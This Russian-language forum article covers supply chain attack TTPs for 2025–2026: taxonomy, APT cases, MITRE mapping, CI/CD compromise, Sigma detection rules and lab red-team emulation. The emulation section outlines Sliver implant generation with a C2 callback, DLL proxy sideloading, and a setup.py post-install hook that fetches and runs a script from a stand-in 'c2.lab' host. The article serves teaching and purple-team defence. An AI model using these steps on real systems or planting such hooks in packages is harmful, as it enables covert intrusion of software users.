Статья Атаки на цепочку поставок через доверительные отношения: TTP 2025–2026 и эмуляция в лабораторных условиях

dd64de1b-47d7-47db-b281-2aede2fdafee.webp


По данным Group-IB, к 2026 году атаки на цепочку поставок вышли на первое место среди глобальных киберугроз. В марте 2026-го отрасль получила наглядную демонстрацию: пять инцидентов за двенадцать дней - каскадная эксплуатация цепочек доверия, автоисполняемые пейлоады в open-source-пакетах и каскадные SaaS-компрометации. Ваш SOC не детектировал ни одну из этих техник, потому что вредоносная активность шла через подписанные бинарники доверенных вендоров. Я знаю это, потому что воспроизводил каждый из этих сценариев в лабе - и Blue Team стабильно пропускал lateral movement через легитимные MSP-коннекторы. Эта статья - карта всего, что вам нужно знать о supply chain attack TTP в 2025–2026 году: от таксономии векторов и маппинга на MITRE ATT&CK до готовых Red Team сценариев и Sigma-правил, которые наконец начнут ловить эти атаки.

Карта темы​

  • Почему атаки через доверительные отношения - самый разрушительный вектор
  • Таксономия: 4 типа компрометации цепочки поставок ПО
  • APT-группировки: Lazarus, APT29, Cl0p и Earth Kurma
  • 7 техник MITRE ATT&CK, формирующих kill chain в 2025–2026
  • DLL Sideloading и Code Signing Abuse в контексте поставщиков
  • Компрометация CI/CD-пайплайнов
  • Red Team: эмуляция supply chain атак в лабораторных условиях
  • Слепые зоны детектирования: SAST, SCA, EDR
  • Threat Intelligence 2026: каскадные атаки и новая реальность third-party risk

Почему атаки через доверительные отношения - самый разрушительный вектор 2025 года​

Классическая кибератака работает против защиты. Атаки на цепочку поставок работают вместе с защитой - используя те самые доверительные отношения, которые организация выстраивала годами. Когда злоумышленник компрометирует доверенного поставщика, его вредоносный код приходит по легитимному каналу обновлений, подписан валидным сертификатом и выполняется с привилегиями, которые IT-отдел сам предоставил вендору.

Техника T1199 (Trusted Relationship) в MITRE ATT&CK описывает именно этот вектор: злоумышленник получает доступ к целевой организации через скомпрометированную третью сторону - MSP-провайдера, облачного подрядчика или вендора ПО. В отличие от фишинга, где нужно убедить человека кликнуть ссылку, trusted relationship attack эксплуатирует машинное доверие: VPN-туннели, API-токены, OAuth-сессии, агенты мониторинга.

Почему это разрушительнее прямой атаки:
  • Масштаб: один скомпрометированный поставщик дает доступ к сотням и тысячам клиентов одновременно. SolarWinds - 18 000 организаций. MOVEit - более 2500 компаний.
  • Невидимость: EDR не алертит на активность подписанного бинарника вендора. SIEM не триггерит правило на штатное VPN-подключение MSP.
  • Время обнаружения: по статистике, компрометация через доверенного подрядчика остается необнаруженной в среднем в 2–3 раза дольше, чем прямое вторжение.
  • Доверие как оружие: жертва сама устанавливает бэкдор - добровольно, через обновление.
На моих purple team-сессиях я неоднократно наблюдал картину: Blue Team мгновенно детектирует Cobalt Strike beacon, запущенный через PowerShell, но полностью пропускает тот же beacon, загруженный через доверенный агент мониторинга подрядчика. Это не баг детектирования - это фундаментальная проблема архитектуры доверия.

4 типа компрометации цепочки поставок: таксономия для Red Team и Blue Team​

Термин «атаки на цепочку поставок» используется так широко, что потерял точность. На практике я разделяю четыре принципиально разных вектора, каждый из которых требует отдельной стратегии и эмуляции.

Компрометация программных зависимостей (T1195.001)​

Злоумышленник отравляет компонент в репозитории пакетов - npm, PyPI, Maven. Примеры 2024 года из отчёта Kaspersky: вредоносные npm-пакеты воровали SSH-ключи у сотен разработчиков (январь 2024), заброшенный пакет на PyPI начал распространять инфостилер Nova Sentinel (февраль 2024), а в декабре 2024 зараженная версия ИИ-модели Ultralytics YOLO11 появилась прямо в PyPI.

Компрометация цепочки поставок ПО (T1195.002)​

Атака на сам процесс сборки и доставки: злоумышленник внедряет бэкдор в легитимное ПО на этапе компиляции, подписи или распространения. Классика - SolarWinds SUNBURST, XZ Utils (CVE-2024-3094), бэкдор в JAVS (май 2024).

Атака через доверительные отношения (T1199)​

Компрометация MSP, облачного провайдера или вендора с прямым доступом к инфраструктуре жертвы. Здесь не нужен вредоносный код в обновлении - достаточно украсть учётные данные подрядчика или перехватить его OAuth-токен.

Компрометация аппаратной цепочки (T1195.003)​

Внедрение имплантов на уровне прошивок, чипсетов, периферийных устройств. Наиболее ресурсоёмкий вектор, характерный для nation-state операций.

Практический чеклист для классификации инцидента:

ПризнакT1195.001T1195.002T1199T1195.003
Вектор доставкиПакетный менеджерОбновление вендораVPN/API/АгентФизическое устройство
Нужен ли доступ к инфраструктуре жертвыНетНетДа (через подрядчика)Да (физический)
МасштабСреднийМассовыйТаргетированныйТочечный
Скорость детектированияСредняяНизкаяОчень низкаяКрайне низкая

Lazarus, APT29, Cl0p и Earth Kurma: кто превратил supply chain в основное оружие​

Атаки через подрядчиков APT-группировками - не новый тренд, но в 2024–2026 годах он вышел на качественно новый уровень. Разберём ключевых акторов.

Lazarus (DPRK) и UNC4736: каскадная атака 3CX​

Инцидент 3CX в 2023 году - эталонный пример каскадной компрометации. Lazarus (кластер UNC4736) сначала скомпрометировал Trading Technologies, затем через заражённое ПО X_TRADER проник в 3CX и троянизировал десктопный клиент. Техническая цепочка: вредоносный установщик X_TRADER внедрял DLL через sideloading, устанавливал модульный бэкдор VEILEDSIGNAL, который позволял операторам перемещаться латерально до CI/CD-инфраструктуры 3CX. Результат - скомпрометированные сборки 3CXDesktopApp с подписанными Electron-приложениями, содержащими загрузчик.

APT29 (Cozy Bear): SolarWinds как поворотная точка​

Операция SUNBURST 2020 года остаётся самым масштабным примером T1195.002. APT29 получил доступ к билд-серверу SolarWinds Orion и внедрил бэкдор в процесс сборки. Вредоносный код был подписан валидным сертификатом вендора и распространён через штатный механизм обновлений. Особенность - бэкдор ждал 12–14 дней перед активацией, а DNS-запросы C2 маскировались под легитимный трафик SolarWinds.

Cl0p: MOVEit и массовая эксплуатация managed file transfer​

Cl0p в 2023–2024 годах систематически атаковал решения для управляемой передачи файлов - GoAnywhere MFT, MOVEit Transfer. Группировка эксплуатировала zero-day уязвимости в продуктах, которые организации использовали именно для безопасного обмена данными с подрядчиками. Ирония в том, что инструмент защиты стал вектором компрометации.

Earth Kurma: APT в Юго-Восточной Азии​

Earth Kurma - группировка, задокументированная Trend Micro в 2024–2025 годах, таргетирующая правительственные организации в Юго-Восточной Азии. Характерная особенность - компрометация доверенных поставщиков государственных IT-систем с последующим lateral movement через легитимные каналы обслуживания.

Ключевой вывод для Red Team: каждая из этих группировок использует supply chain не как разовый трюк, а как системную стратегию. Их TTP должны быть в вашей матрице эмуляции.

7 техник MITRE ATT&CK, которые формируют kill chain атак на цепочку поставок в 2025–2026​

При маппинге TTP атак на цепочку поставок через MITRE ATT&CK Navigator я стабильно вижу одни и те же техники. Вот семь, которые определяют kill chain в 2025–2026.

T1195 - Supply Chain Compromise. Корневая техника с тремя суб-техниками. В 2024 году, по данным Kaspersky, как минимум 12 значимых инцидентов относились к T1195.001 (dependency poisoning) - от npm и PyPI до CDN-сервиса Polyfill.io, через который десятки тысяч сайтов раздавали вредоносный код посетителям.

T1199 - Trusted Relationship. Атака через доверительные отношения с третьей стороной. Не требует вредоносного кода в ПО - достаточно скомпрометировать учётные данные подрядчика. В контексте 2026 года Group-IB фиксирует рост OAuth token abuse - злоумышленники крадут OAuth-токены MSP-провайдеров для каскадного доступа к клиентам.

T1554 - Compromise Client Software Binary. Модификация клиентского ПО на хосте жертвы. Используется для закрепления после компрометации через supply chain - модифицируется бинарник уже установленного доверенного ПО.

T1574.002 - DLL Side-Loading. Основная техника доставки пейлоада в атаках Lazarus и UNC4736. Злоумышленник подкладывает вредоносную DLL рядом с легитимным исполняемым файлом, который загружает её по приоритету Windows DLL Search Order.

T1553.002 - Code Signing. Злоумышленник подписывает вредоносный код украденным или скомпрометированным сертификатом вендора. Это обходит проверки Windows SmartScreen, EDR-политики и белые списки приложений.

T1059 - Command and Scripting Interpreter. Постэксплуатационная техника: после доставки через supply chain начинается выполнение команд. В инциденте с axios (задокументирован Vectra AI) скомпрометированный npm-пакет быстро переключался с выполнения кода на credential abuse.

T1071.001 - Application Layer Protocol (Web). C2-коммуникация через HTTPS, замаскированная под штатный трафик к серверам вендора. SUNBURST использовал DNS, современные имплементации чаще используют HTTPS к легитимным доменам.

Чеклист маппинга для вашей матрицы ATT&CK:
Код:
T1195.001 → Dependency poisoning (npm/PyPI/Maven)
T1195.002 → Build system compromise (CI/CD trojanization)
T1199    → MSP/vendor credential abuse, OAuth token theft
T1554    → Post-compromise binary modification
T1574.002 → DLL sideloading for payload delivery
T1553.002 → Code signing with stolen certificates
T1059    → Post-exploitation scripting

DLL Sideloading и Code Signing Abuse: два столпа компрометации поставщиков​

Если вы анализируете любую серьёзную атаку на цепочку поставок за последние три года, с высокой вероятностью вы найдёте в ней DLL sideloading, code signing abuse или оба приёма одновременно.

DLL Sideloading в контексте supply chain​

Windows ищет DLL-библиотеки в определённом порядке: сначала директория приложения, потом системные пути. Когда злоумышленник размещает вредоносную DLL в директории легитимного подписанного приложения вендора, Windows загружает её без вопросов. EDR видит: доверенный исполняемый файл загружает библиотеку из своей директории - штатное поведение.

В атаке на 3CX Lazarus использовал именно эту технику: троянизированные DLL-библиотеки (ffmpeg.dll, d3dcompiler_47.dll) загружались легитимным подписанным процессом 3CXDesktopApp.exe. Цепочка загрузки выглядела абсолютно легитимно для EDR-решений.

Для воспроизведения в лабе я использую типичную конструкцию:
Код:
# Создание DLL-прокси для sideloading (концепция)
# Шаг 1: Анализ импортов целевого приложения
dumpbin /imports target_vendor_app.exe

# Шаг 2: Создание прокси-DLL, которая пробрасывает вызовы к оригиналу
# и добавляет вредоносную логику в DllMain
# Шаг 3: Размещение в директории приложения
copy malicious_proxy.dll C:\Program Files\VendorApp\original_name.dll

Code Signing Abuse как вектор атаки​

Цифровая подпись - не гарантия безопасности, а вектор атаки. Если злоумышленник получает доступ к сертификату подписи вендора (через компрометацию билд-сервера, кражу HSM-ключей или цепочку CI/CD), весь его вредоносный код становится «доверенным».

В инциденте SolarWinds бэкдор SUNBURST был подписан валидным сертификатом SolarWinds. В атаке на JAVS (май 2024) троянизированная версия ПО для видеозаписи судебных заседаний также имела валидную цифровую подпись.

Практические меры верификации:

КонтрольЧто проверятьИнструмент
Верификация подписиЦепочка доверия, timestamp, отзывsigcheck (Sysinternals), cosign
Мониторинг загрузки DLLDLL из нестандартных путейSysmon Event ID 7
Baseline бинарниковХеш-суммы файлов вендораosquery, OSSEC
Build provenanceSLSA attestation, SBOMsigstore, in-toto

Компрометация CI/CD-пайплайнов: от отравленного коммита до reverse shell за один билд​

CI/CD-пайплайн - самая привлекательная цель в цепочке поставок ПО. Компрометация одного билд-сервера превращает каждый последующий релиз вендора в средство доставки вредоносного кода всем его клиентам.

Анатомия атаки на CI/CD​

Типичный сценарий компрометации CI/CD-пайплайна, который я отрабатываю в лабе на Gitea + Drone CI + Nexus:
  1. Initial Access: злоумышленник получает доступ к репозиторию (украденный токен, compromised developer account, dependency confusion)
  2. Persistence в пайплайне: модификация CI-конфигурации (.drone.yml, .github/workflows/) для внедрения шага сборки, который инжектит пейлоад
  3. Build poisoning: вредоносный код компилируется вместе с легитимным проектом, подписывается сертификатом вендора
  4. Распространение: артефакт публикуется в Nexus/Artifactory и доставляется через штатные каналы обновлений

Dependency Confusion в 2025​

Техника dependency confusion продолжает работать: злоумышленник публикует пакет с тем же именем, что и внутренний пакет организации, но в публичном репозитории с более высоким номером версии. Package-менеджер подтягивает вредоносную версию автоматически.

Пример базовой проверки на уязвимость к dependency confusion:
Bash:
# Проверка, есть ли ваши внутренние пакеты в публичном npm
npm view @your-internal-scope/package-name --registry https://registry.npmjs.org

# Аудит зависимостей на known-supply-chain-issues
trivy fs --scanners vuln,secret,misconfig ./project-directory

# Semgrep для обнаружения опасных паттернов в CI-конфигурации
semgrep --config "p/ci-cd-security" .github/workflows/

Март 2026: каскадная эксплуатация автоматизации​

По данным отчёта DreamFactory, в марте 2026 года произошла серия атак, эксплуатирующих именно CI/CD-автоматизацию и доверительные отношения в цепочках open-source-зависимостей. Автоисполняемые скрипты в пакетах, каскадное распространение через транзитивные зависимости - всё это стало возможным, потому что CI/CD-системы доверяют upstream-репозиториям по умолчанию.

Минимальный чеклист защиты CI/CD:
  • Pinning зависимостей по хешу, не по версии
  • Изоляция билд-среды (ephemeral runners)
  • Подпись коммитов (GPG/Sigstore)
  • Проверка SLSA provenance для критических артефактов
  • Мониторинг изменений в CI-конфигурации через git diff alerting

GitHub как вектор атаки на цепочку поставок​

Отдельного внимания заслуживает компрометация через GitHub-инфраструктуру: username hijacking (захват освободившихся имён пользователей), угон заброшенных репозиториев и внедрение вредоносного кода через форки и pull request'ы. Эти техники позволяют злоумышленнику встроиться в цепочку доверия на уровне исходного кода - ещё до того, как CI/CD-пайплайн запустит первый билд. Подробно о механиках атак на supply chain GitHub, username hijacking и методах защиты репозиториев.

Red Team: как эмулировать атаки на цепочку поставок в лабораторных условиях​

Теория без практики бесполезна. Вот три сценария эмуляции атак цепочки поставок, которые я регулярно провожу в изолированных лабах для purple team-сессий.

Сценарий 1: SolarWinds-style - троянизированное обновление через Nexus​

Инфраструктура лаба:
  • Gitea (Git-сервер) + Drone CI (CI/CD) + Nexus (репозиторий артефактов)
  • Целевая Windows-машина с установленным «вендорским» агентом
  • Sliver C2 server для приёма коллбэков
Шаги:
Bash:
# 1. Клонируем легитимный проект "vendor-agent" в Gitea
git clone http://gitea.lab:3000/vendor/monitoring-agent.git

# 2. Модифицируем процесс сборки - добавляем шаг инжекции
# В .drone.yml добавляем step, который встраивает shellcode в бинарник
# (в реальном SolarWinds использовался build-time injection)

# 3. Генерируем Sliver implant для встраивания
sliver > generate --mtls lab-c2.local --os windows --arch amd64 \
  --format shellcode --save /tmp/implant.bin

# 4. После сборки артефакт публикуется в Nexus
# Целевая машина получает обновление через штатный механизм

# 5. При запуске обновлённого агента - коллбэк на Sliver C2
sliver > sessions
# Сессия получена через "легитимное" обновление

Сценарий 2: 3CX-style - DLL Sideloading через доверенное приложение​

Bash:
# 1. Берём легитимный подписанный EXE вендора
# 2. Анализируем его DLL-импорты
dumpbin /imports VendorApp.exe | findstr ".dll"

# 3. Создаём прокси-DLL с помощью SharpDLLProxy или вручную
# DLL пробрасывает все легитимные вызовы к оригинальной библиотеке
# и исполняет Sliver shellcode в DllMain

# 4. Размещаем прокси-DLL и оригинал в директории приложения
# 5. При запуске VendorApp.exe - загрузка нашей DLL, C2 callback

Сценарий 3: Trojanized PyPI-пакет - dependency confusion​

Bash:
# 1. Создаём пакет с именем внутренней зависимости заказчика
# setup.py содержит post-install hook:

# 2. В setup.py:
# import subprocess
# subprocess.run(["curl", "http://c2.lab/stage2.sh", "-o", "/tmp/s.sh"])
# subprocess.run(["bash", "/tmp/s.sh"])
# (пример для демонстрации концепции - не для продакшена)

# 3. Публикуем в локальное PyPI-зеркало с версией 99.0.0
# 4. pip install подтягивает нашу версию вместо внутренней
Что проверяем на стороне Blue Team после каждого сценария:
  • Сработал ли EDR на загрузку DLL?
  • Есть ли алерт SIEM на нестандартный network callback?
  • Обнаружил ли SCA-сканер модификацию зависимости?
  • Зафиксировал ли Sysmon Event ID 7 подозрительную загрузку модуля?

Слепые зоны детектирования: почему SAST, SCA и EDR пропускают supply chain атаки​

На каждой purple team-сессии с фокусом на supply chain я документирую, где именно ломается детектирование. Паттерн стабильно повторяется.

SAST не видит контекст поставки​

Статический анализ кода (Semgrep, SonarQube) проверяет ваш код, но не код зависимостей на уровне бинарников. Если вредоносная логика внедрена в pre-compiled binary или в build-time injection - SAST слеп. Я регулярно демонстрирую это заказчикам: Semgrep с правилами p/supply-chain ловит подозрительные паттерны в manifest-файлах, но пропускает скомпилированный shellcode в .dll внутри node_modules.

SCA работает по базе - но не по поведению​

Software Composition Analysis (Trivy, Snyk, Dependabot) проверяет версии зависимостей по базе известных уязвимостей. Проблема: zero-day supply chain атака по определению отсутствует в базе. Когда XZ Utils (CVE-2024-3094) был скомпрометирован, между внедрением бэкдора и его обнаружением прошли месяцы. Всё это время SCA-сканеры рапортовали «всё чисто».

EDR доверяет подписанным бинарникам​

Это главная слепая зона. EDR-решения используют репутационные базы: подписанный бинарник известного вендора = доверенный. Когда 3CXDesktopApp.exe (подписанный, легитимный) загружал троянизированную ffmpeg.dll, большинство EDR-агентов не генерировали алерт. Процесс-родитель - легитимный. DLL загружена из штатной директории. Сетевой коллбэк - к IP, который до этого не был в блоклистах.

Sigma-правила, которые помогают закрыть разрывы​

YAML:
# Sigma rule: подозрительная DLL загрузка подписанным приложением
title: Suspicious DLL Load by Signed Vendor Application
status: experimental
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\ffmpeg.dll'
            - '\d3dcompiler_47.dll'
        Image|endswith:
            - '\3CXDesktopApp.exe'
            - '\VendorAgent.exe'
    filter:
        ImageLoaded|startswith: 'C:\Program Files'
        Signed: 'true'
        SignatureStatus: 'Valid'
    condition: selection and not filter
    # Идея: алертить даже на подписанные DLL,
    # если они загружаются из нестандартных путей
level: medium

---
# Sigma rule: нетипичный DNS/HTTPS callback после обновления ПО
title: Unusual Outbound Connection After Software Update
status: experimental
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith:
            - '\update.exe'
            - '\updater.exe'
    filter:
        DestinationHostname|endswith:
            - '.vendor-domain.com'
            - '.microsoft.com'
    condition: selection and not filter
level: high
Рекомендация: выстраивайте детектирование не по сигнатурам вредоносного кода (его подпишут), а по аномалиям поведения: нетипичные сетевые коннекты после обновлений, загрузка DLL из temp-директорий подписанными процессами, изменения в CI-конфигурации без review.

Threat Intelligence 2026: каскадные атаки, OAuth abuse и конец слепого доверия к open source​

Если 2024 год был годом осознания масштаба угрозы (12 крупных инцидентов по Kaspersky), то 2025–2026 - годы каскадных атак, где компрометация одного звена автоматически распространяется через цепочки доверия.

Каскадные SaaS-компрометации​

По данным Group-IB, среди ключевых угроз 2026 года - cascading SaaS breaches. Схема: злоумышленник компрометирует одного SaaS-провайдера, через OAuth-интеграции получает доступ к данным и системам всех подключённых организаций. Это эволюция T1199 - доверительные отношения масштабируются через API-связность современных облачных экосистем.

OAuth Token Abuse как новый вектор​

OAuth-токены MSP-провайдеров и SaaS-интеграций становятся приоритетной целью. Вместо компрометации VPN-туннеля злоумышленнику достаточно украсть refresh token OAuth-приложения подрядчика - и он получает персистентный доступ к ресурсам всех клиентов этого подрядчика. По данным Group-IB, этот вектор активно используется в ransomware-операциях через цепочку поставок.

Пять атак за двенадцать дней: март 2026​

Серия инцидентов марта 2026, задокументированная DreamFactory, продемонстрировала cascading trust chain exploitation - когда компрометация одного open-source-пакета через транзитивные зависимости затрагивала тысячи проектов. Auto-executing пейлоады в CI/CD-среде, автоматический деплой заражённых пакетов - всё это стало возможным, потому что экосистема open source построена на имплицитном доверии.

Malicious Browser Extensions​

Group-IB также фиксирует рост вредоносных browser extensions как вектора supply chain. Расширения для браузера имеют доступ к cookies, сессиям, вводимым данным - и распространяются через официальные маркетплейсы с механизмом автообновления.

Атаки на AI-инструменты разработчиков​

Отдельным вектором 2025–2026 годов стали атаки на AI-инструменты разработчиков через malvertising и фейковые установщики. Злоумышленники создают поддельные страницы популярных AI-ассистентов и IDE-плагинов, продвигают их через рекламные сети и распространяют инфостилеры под видом легитимных инструментов. Этот вектор особенно опасен в контексте supply chain: разработчик, установивший заражённый AI-плагин, компрометирует не только свою машину, но и CI/CD-среду, к которой имеет доступ.

Что это значит для threat intelligence цепочки поставок в 2026​

Ключевые индикаторы, которые ваша TI-команда должна мониторить:
  • Смена владельца/мейнтейнера open-source-пакетов в ваших зависимостях
  • Аномальные обновления без release notes или с минимальными изменениями
  • Новые OAuth-приложения в вашем тенанте от провайдеров-подрядчиков
  • Изменения в DNS-записях домейнов CDN-сервисов ваших вендоров (как в случае Polyfill.io)
  • Публикация пакетов с именами, похожими на ваши внутренние (typosquatting, dependency confusion)
Специализированные TI-команды, включая RT-Solar в России, наращивают компетенции по мониторингу threat intelligence в контексте подрядчиков и цепочек поставок. Но реальность такова: третьих сторон в средней организации - сотни, а видимость в их безопасность - почти нулевая.

Что делать прямо сейчас: экспертный взгляд на 2025–2026​

Атаки на цепочку поставок - не отдельная категория угроз. Это фундаментальный сдвиг модели атаки: от «ломаем периметр жертвы» к «ломаем того, кому жертва доверяет». Каждая purple team-сессия, которую я провожу, подтверждает: организации инвестируют в защиту собственного периметра, но слепы к рискам, приходящим через доверенные каналы.

В ближайший год ожидаю три ключевых изменения. Первое: каскадные атаки через SaaS-интеграции и OAuth станут массовыми - это проще и масштабнее, чем троянизация бинарников. Второе: open-source supply chain превратится в поле боя, и проекты без SLSA attestation и верифицированных SBOM будут считаться токсичными. Третье: регуляторы начнут требовать доказуемую безопасность цепочки поставок - аналогично тому, как NIST уже движется в сторону обязательных SBOM.

Конкретные действия: проведите инвентаризацию всех третьих сторон с доступом к вашей инфраструктуре. Для каждого подрядчика определите - какие именно техники из описанных семи TTP применимы к вашей связке с ним. Запустите первый Red Team сценарий из этой статьи в изолированной лабе. Внедрите хотя бы два Sigma-правила из раздела о детектировании. Это минимум, с которого стоит начать.
 
Последнее редактирование:
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab